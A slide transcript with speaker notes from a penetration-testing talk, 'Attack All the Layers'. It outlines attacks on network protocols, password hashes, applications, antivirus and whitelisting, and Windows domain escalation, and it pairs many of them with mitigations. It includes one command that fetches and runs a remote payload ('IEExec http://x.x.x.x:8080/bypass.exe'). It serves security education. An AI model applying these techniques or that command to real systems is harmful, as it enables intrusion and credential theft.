Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 

Attack All the Layers - What's Working in Penetration Testing

  • 1. Attack All the Layers: What’s Working During Pen Tests Scott Sutherland and Karl Fosaaen
  • 2. Introductions • Scott Sutherland ‒ Principal Security Consultant @ NetSPI ‒ Twitter: @_nullbind • Karl Fosaaen ‒ Senior Security Consultant @ NetSPI ‒ Twitter: @kfosaaen We specialize in both things and stuff!
  • 3. Overview • Why do Companies Pen Test? • Attacking Protocols • Attacking Passwords • Attacking Applications • Bypassing End Point Protection • Windows Escalation • Conclusions
  • 4. Why do companies pen test? • Compliance requirements • Evaluate risks associated with an acquisition or partnership • Validate preventative controls • Validate detective controls • Prioritize internal security initiatives • Proactively prevent breaches
  • 5. Overview • Attacking Protocols • Attacking Passwords • Attacking Applications • Bypassing End Point Protection • Windows Escalation
  • 6. Attacking protocols • ARP: Address Resolution Protocol • NBNS: NetBIOS Name Service • SMB: Server Message Block • PXE: Preboot Execution Environment • DTP: Dynamic Trunking Protocol
  • 8. Attacking protocols: ARP • General ‒MAC to IP association ‒Layer 2 • Conditions ‒Independent of user action ‒Broadcast network • Attacks ‒MITM Monitoring ‒MITM Injection ‒DOS
  • 10. Attacking protocols: ARP • Common mitigating controls: ‒ Dynamic ARP Inspection ‒ Port Security ‒ Static Routes (not recommended)
  • 11. Attacking protocols: NBNS / LLMNR NetBIOS Name Service
  • 12. Attacking protocols: NBNS • General ‒ IP to hostname association ‒ Layer 5 / 7 • Constraints ‒ Dependent on user action ‒ Broadcast Network ‒ Windows Only • Attacks ‒ MITM Monitoring ‒ MITM Injection ‒ DOS
  • 16. Attacking protocols: NBNS • Common mitigating controls: ‒ Create a WPAD (Web Proxy Auto-Discovery) server entry in DNS ‒ Disable NBNS (recommended) • Might cause issues with legacy apps ‒ Disable insecure authentication to help • limit impact of exposed hashes ‒ Enable packet signing to help prevent • SMB Relay attacks
  • 18. Attacking protocols: SMB • General ‒ SMB is the come back kid! ‒ Layer 7 • Constraints ‒ Dependent on user action ‒ Any routable network ‒ No connecting back to originating host • Attacks ‒ Command execution ‒ Shells..aaand shells
  • 20. Attacking protocols: SMB • Historically, SMB Relay has been used to: ‒ Execute arbitrary commands ‒ Obtain shells • Lately the community has been developing tools for doing things like: ‒ LDAP queries ‒ SQL queries ‒ Exchange services ‒ Mounting file systems
  • 21. Attacking protocols: SMB • Common mitigating controls: ‒ Enable packet signing to help prevent SMB Relay attacks ‒ Apply really old patches like if you missed out on the last decade…
  • 23. Attacking protocols: PXE • General ‒ DHCP • Constraints ‒ Broadcast domain • Attacks ‒ Command execution ‒ Access to file system/images
  • 24. Attacking protocols: PXE • Common mitigating controls: ‒ Isolate networks ‒ Add device validation
  • 26. Attacking protocols: DTP • General ‒ 802.1Q encapsulation is in use ‒ Layer 2 • Constraints ‒ Independent of user action ‒ Trunking is set to enabled • or auto on switch port • Attacks ‒ Monitor network traffic for all VLANs, because all VLANs are • allowed on a trunk by default • *Full VLAN hopping
  • 31. Attacking protocols: DTP • Common mitigating controls: ‒ Use dedicated VLAN ID for all trunking ports ‒ Disable all unused ports and place them on a non-routable VLAN ‒ Configure all user ports as access ports to prevent trunk negotiation ‒ Configure frames with two 802.1Q headers ‒ Configure strong VACLs
  • 32. Overview • Attacking Protocols • Attacking Passwords • Attacking Applications • Bypassing End Point Protection • Windows Escalation
  • 33. Attacking passwords • Hashes and Cracking (Offline) • Dictionary Attacks (Online) • Dump in Cleartext!
  • 34. Attacking Passwords Tool Function Year Pass the Hash Passing Hashes 1997 Rainbow Tables Password Cracking 2000s SMB Relay Relaying Captured Hashes 2001 John the Ripper Password Cracking 2001 NetNTLM.pl Cracking Network Hashes 2007 PTH Toolkit Pass all the Hashes 2008 Hashcat CPU and GPU Cracking 2010 WCE and Mimikatz Cleartext Windows Creds 2012
  • 35. Attacking Passwords: Hashes • What are hashes? ‒ A non-reversible way of storing passwords ‒ Operating systems and applications ‒ Lots of types • LM/NTLM • Network and Local • MD5 • SHA • descrypt
  • 36. Attacking Passwords: Hashes • How do we get hashes? ‒ Cain and Abel ‒ fgdump ‒ Metasploit ‒ Mimikatz ‒ Databases ‒ Config files
  • 37. Attacking Passwords: Cracking • Cracking Hashes ‒ Rainbow Tables ‒ John the Ripper ‒ oclHashcat ‒ CPU versus GPU
  • 40. Attacking Passwords: Passing Hashes • Passing Hashes ‒ Metasploit ‒ psexec ‒ winexec ‒ PTH toolkit
  • 41. Attacking Passwords: Dictionary • Online Vs. Offline Attacks • Dictionary Attacks ‒ Enumerate users • Null SMB logins, RPC, *SID BF, SNMP, LDAP, SharePoint, etc. ‒ Attack! • Are users getting smarter? ‒ Sort of… • “Summer2014” meets password • complexity requirements
  • 42. Attacking Passwords: Cleartext • Common application configs • Reversible Formats ‒ Find in files ‒ Groups.xml ‒ Unattend.xml ‒ Registry • WCE • Mimikatz
  • 43. Overview • Attacking Protocols • Attacking Passwords • Attacking Applications • Bypassing End Point Protection • Windows Escalation
  • 44. Attacking Applications: Common • Default and weak passwords • SQL injection • RFI/web shells • Web directory traversals • UNC path injection + SMB relay • Critical missing patches
  • 45. Attacking Applications: Breakouts • Obtain a common dialog box • Bypass folder path and file type restrictions • Bypass file execution restrictions • Bypass file black/white lists • Access to native consoles and management tools • Downloading and use third party applications
  • 46. Overview • Attacking Protocols • Attacking Passwords • Attacking Applications • Bypassing End Point Protection • Windows Escalation
  • 47. Bypassing EPP: Anti-virus • PowerShell code Injection • Execute off network share • Clone resource tables • Modify import tables • Pack files
  • 48. Bypassing EPP: App White List • Execution via approved apps ‒ Powershell Code Injection ‒ Rundll32 mydll,DLLMain@12 ‒ IEExec http://x.x.x.x:8080/bypass.exe • Exceptions ‒ File name ‒ Publisher ‒ Directory • Excessive privileges ‒ Services and policy
  • 49. Overview • Attacking Protocols • Attacking Passwords • Attacking Applications • Bypassing End Point Protection • Windows Escalation
  • 50. Windows Escalation: Overview • Privilege Escalation Goals • Local Privilege Escalation • Domain Privilege Escalation
  • 51. Windows Escalation: Goals • Local Escalation Goals ‒ Find clear text or reversible credentials with local administrative privileges ‒ Get application to run commands as Administrator or LocalSystem • Domain Escalation Goals ‒ Find Domain Admins ‒ Impersonate Domain Admins
  • 52. Windows Escalation: Local • Local Escalation ‒ *Clear text credentials in files, registry, over network ‒ Insecure service paths ‒ DLL preloading ‒ DLL and exe replacement ‒ Binary planting in auto-run locations (reg and file system) ‒ Modifying schedule tasks ‒ *Local and remote exploits ‒ Leverage local application like IIS, SQL Server etc ‒ *UNC path injection + SMB Relay / Capture + crack
  • 53. Windows Escalation: Domain • Domain Escalation – Find DAs ‒ Check locally! (Processes, Tokens, Cachedump) ‒ Review active sessions – netsess (veil) ‒ Review remote processes - tasklist ‒ Service Principal Names (SPN) – get-spn ‒ Scanning Remote Systems for NetBIOS Information - nbtscan ‒ Pass the hash to other systems ‒ PowerShell shell spraying ‒ WINRM/WINRS shell spraying ‒ Psexec shell spraying
  • 54. Windows Escalation: Domain • Domain Escalation – Impersonate DAs ‒ Dump passwords from memory with Mimikatz ‒ Migrate into the Domain Admin’s process ‒ Steal Domain Admins delegation tokens with Incognito ‒ Dump cached domain admin hashes with cachedump ‒ Relatively new techniques • PTH using Kerberos ticket
  • 55.
  • 56. Conclusions • Most Networks ‒ Kind of broken • Most Protocols ‒ Kind of broken • Most Applications ‒ Kind of broken All can kind of be fixed
  • 57. Attack all the layers! • Any questions?
  • 58. Attack all the layers! • Scott Sutherland ‒ Principal Security Consultant ‒ Twitter: @_nullbind • Karl Fosaaen ‒ Senior Security Consultant ‒ Twitter: @kfosaaen

Notas del editor

  1. Validation controls = ids/ips/waf incident response
  2. These are protocols that are commonly targeted. However, there are many others:Address Resolution Protocol (ARP): Cain, ettercap, interceptor-ng, Subterfuge, easycredsNetBIOS Name Service (NBNS): MetaSploit and responder Link-local Multicast Name Resolution (LLMNR): MetaSploit and responder Pre-Execution Environment (PXE): MetaSploitDynamic Trunking Protocol (DTP): Yersinia Spanning-Tree Protocol (STP): Yersinia, ettercap (lamia plugin) Hot Stand-by Router Protocol (HSRP): Yersinia Dynamic Host Configuration Protocol (DHCP): Interceptor, MetaSploit, manual setup Domain Name Services (DNS): MetaSploit, ettercap, dsniff, zodiac, ADMIdPackVLAN Tunneling Protocol (VTP): Yersinia, voiphopper, or modprobe+ifconfig
  3. Been an issue since the birth of the internet and hasn’t really gone away.ARP is a broadcast protocol used for IP to MAC relationshipsLimited to broadcast network- No encryption or validation allows for spoofingMITM Step 1 – tell server you are a clientMITM Step 2 - tell client you are the serverCan also broadcast as gateway to all systems on subnet, but your most likely not a router – so don’t do thatCan also dos very easily
  4. Been an issue since the birth of the internet and hasn’t really gone away.ARP is a broadcast protocol used for IP to MAC relationshipsLimited to broadcast network- No encryption or validation allows for spoofingMITM Step 1 – tell server you are a clientMITM Step 2 - tell client you are the serverCan also broadcast as gateway to all systems on subnet, but your most likely not a router – so don’t do thatCan also dos very easily
  5. Been an issue since the birth of the internet and hasn’t really gone away.ARP is a broadcast protocol used for IP to MAC relationshipsLimited to broadcast network- No encryption or validation allows for spoofingMITM Step 1 – tell server you are a clientMITM Step 2 - tell client you are the serverCan also broadcast as gateway to all systems on subnet, but your most likely not a router – so don’t do thatCan also dos very easily
  6. Go with what you like. 
  7. Been an issue since the birth of the internet and hasn’t really gone away.ARP is a broadcast protocol used for IP to MAC relationshipsLimited to broadcast network- No encryption or validation allows for spoofingMITM Step 1 – tell server you are a clientMITM Step 2 - tell client you are the serverCan also broadcast as gateway to all systems on subnet, but your most likely not a router – so don’t do thatCan also dos very easily
  8. Windows Protocol- Kind of like a back up to DNS- Host file- DNS- NBNSRace condition Limited to broadcast network
  9. Go with what you like. http basichttp_ntlmauthhttp_relaysmb
  10. Been an issue since the birth of the internet and hasn’t really gone away.ARP is a broadcast protocol used for IP to MAC relationshipsLimited to broadcast network- No encryption or validation allows for spoofingMITM Step 1 – tell server you are a clientMITM Step 2 - tell client you are the serverCan also broadcast as gateway to all systems on subnet, but your most likely not a router – so don’t do thatCan also dos very easily
  11. In summary, an SMB Relay attack can be loosely defined as the process of relaying SMB authentication from one system to another via a man-in-the-middle (MITM) position. Based on my five whole minutes of wiki research I now know that the issues that allow smb attacks to be succesful were identified as a threat in the late 90’s. However, it wasn’t until 2001 that Sir Dystic publicly released a tool that could be used to perform practical attacks. Seven years later Microsoft got around to partially fixing the issue with a patch, but it only prevents attackers from relaying back to the originating system.I guess the good news is that SMB relay attacks can be prevented by enabling and requiring smb message signing, but the bad news is that most environments are configured in such a way that attackers can still relay authentication to other systems.2001 was a while ago, so I got out my calculator and did some hardcore math to figure out that this has been a well known and practiced attack for at least 11 years. During that time there have been many tools and projects dedicated to taking advantage of the attack technique. Some of the more popular ones include Metasploit, Squirtle, and ZackAttack.Anyway, let’s get back on track…
  12. Image showing MITM
  13. Go with what you like. http basichttp_ntlmauthhttp_relaysmb
  14. Been an issue since the birth of the internet and hasn’t really gone away.ARP is a broadcast protocol used for IP to MAC relationshipsLimited to broadcast network- No encryption or validation allows for spoofingMITM Step 1 – tell server you are a clientMITM Step 2 - tell client you are the serverCan also broadcast as gateway to all systems on subnet, but your most likely not a router – so don’t do thatCan also dos very easily
  15. In summary, an SMB Relay attack can be loosely defined as the process of relaying SMB authentication from one system to another via a man-in-the-middle (MITM) position. Based on my five whole minutes of wiki research I now know that the issues that allow smb attacks to be succesful were identified as a threat in the late 90’s. However, it wasn’t until 2001 that Sir Dystic publicly released a tool that could be used to perform practical attacks. Seven years later Microsoft got around to partially fixing the issue with a patch, but it only prevents attackers from relaying back to the originating system.I guess the good news is that SMB relay attacks can be prevented by enabling and requiring smb message signing, but the bad news is that most environments are configured in such a way that attackers can still relay authentication to other systems.2001 was a while ago, so I got out my calculator and did some hardcore math to figure out that this has been a well known and practiced attack for at least 11 years. During that time there have been many tools and projects dedicated to taking advantage of the attack technique. Some of the more popular ones include Metasploit, Squirtle, and ZackAttack.Anyway, let’s get back on track…
  16. Been an issue since the birth of the internet and hasn’t really gone away.ARP is a broadcast protocol used for IP to MAC relationshipsLimited to broadcast network- No encryption or validation allows for spoofingMITM Step 1 – tell server you are a clientMITM Step 2 - tell client you are the serverCan also broadcast as gateway to all systems on subnet, but your most likely not a router – so don’t do thatCan also dos very easily
  17. the unauthorized switch can send DTP frames and form a trunk with the Company Switch. If the attacker can establish a trunk link to the Company switch, it receives traffic to all VLANs through the trunk because all VLANs are allowed on a trunk by default.
  18. Image showing MITM
  19. Image showing MITM
  20. Image showing MITM
  21. Image showing MITM
  22. Touch on common tools and pitfalls (account lockouts)
  23. Default and weak passwords for everythingTools: Nmap, Nessus, Web Scour, Manuals, GoogleSQL injectionTools: Manually, web scanners, SQL Ninja, SQL Map, MetasploitRFI/Web Shells (JBOSS, Tomcat, etc.)Tools: Metasploit, Fuzzdb, and other web shelleryWeb directory traversalsTools: Manually, web scanners, Fuzzdb, Metasploit, Critical Missing Patches (SEP etc)Tools: Metasploit, exploitdb exploits, etc
  24. Execution via approved apps - Powershell Code Injection - Rundll32 - IEExecDirectory Exceptions - GACDisable ServicesPoisoning allowed file list and blocking updates via hosts filePoisoning updates
  25. This is a non-linear process so be aware that some techniques can be used at many levels.These are the common escalation scenarios seen during penetration testing.
  26. Localuser  Local AdministratorExcessive local group privileges (admin or power users)Cleartext credentialsSysprep (unattend.xml/ini/txt)Config files, scripts, logs, desktop foldersTech support calls filesWeak application configurations that allow: Restarting or reconfiguring servicesReplacing application files DLL pre or side loading Executable injection via poorly registered services C:\Program Files (x86) vs “C:\Program Files (x86)” Local and remote exploits (Metasploit: getsystem)
  27. This is a non-linear process so be aware that some techniques can be used at many levels.These are the common escalation scenarios seen during penetration testing.
  28. This is a non-linear process so be aware that some techniques can be used at many levels.These are the common escalation scenarios seen during penetration testing.
  29. This is a non-linear process so be aware that some techniques can be used at many levels.These are the common escalation scenarios seen during penetration testing.
  30. Yes it did.